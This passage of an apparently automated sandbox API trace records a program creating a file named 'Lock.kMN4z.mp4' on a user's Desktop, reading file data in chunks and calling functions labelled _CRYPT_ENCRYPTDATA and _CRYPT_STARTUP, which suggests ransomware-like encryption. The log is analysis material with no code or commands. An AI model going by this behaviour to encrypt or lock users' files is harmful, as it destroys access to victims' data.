HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0187.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0187.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0187.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e56430 [0187.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0187.590] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0187.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0187.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0187.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0187.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f14010 [0187.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0187.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0187.590] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.kMN4z.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.kmn4z.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0187.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0187.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0187.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0187.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0187.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0187.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0187.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0187.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0187.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0187.633] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0187.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0187.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0187.633] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0187.633] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0187.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0187.633] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0187.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0187.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0187.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0187.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0187.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0187.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0187.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0187.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0187.637] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0187.637] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0187.640] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x1660, lpOverlapped=0x0) returned 1 [0187.640] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0187.644] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0187.646] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0187.646] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0187.646] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0187.700] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0187.700] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0187.700] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0187.700] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0187.700] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0187.700] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0187.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0187.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0187.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0187.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0187.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0187.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0187.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0187.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0187.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0187.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0187.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0187.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0187.701] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0187.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0187.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0187.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0187.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0187.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0187.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0187.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0187.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0187.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0187.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0187.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0187.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0187.702] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0187.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0187.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0187.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0187.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0187.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0187.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0187.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0187.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0187.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0187.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0187.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0187.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0187.702] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0187.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0187.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0187.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0187.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0187.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0187.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0187.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0187.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0187.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0187.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0187.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0187.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0187.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0187.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0187.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0187.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0187.703] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0187.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0187.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0187.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0187.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0187.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0187.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0187.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0187.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0187.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0187.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0187.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0187.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0187.704] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0187.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0187.704] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0187.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0187.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0187.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0187.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0187.704] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0187.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0187.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0187.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0187.704] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdc0 | out: hHeap=0x970000) returned 1 [0187.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0187.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508d8 [0187.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0187.705] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0187.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0187.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0187.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0187.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0187.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0187.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0187.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0187.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0187.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0187.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0187.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0187.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0187.705] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0187.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0187.705] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0187.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0187.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0187.705] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0187.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0187.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0187.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0187.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0187.706] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0187.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0187.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0187.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0187.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0187.706] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0187.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0187.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0187.706] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0187.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0187.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0187.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0187.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0187.706] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0187.706] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0187.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0187.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0187.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0187.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0187.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0187.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0187.707] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0187.707] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0187.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0187.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0187.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0187.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0187.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0187.707] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc00 | out: hHeap=0x970000) returned 1 [0187.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0187.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0187.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0187.707] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0187.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0187.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0187.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0187.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0187.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0187.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0187.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0187.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0187.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0187.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0187.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0187.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0187.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0187.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0187.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0187.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0187.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0187.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0187.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0187.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0187.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0187.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0187.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0187.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0187.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0187.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0187.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 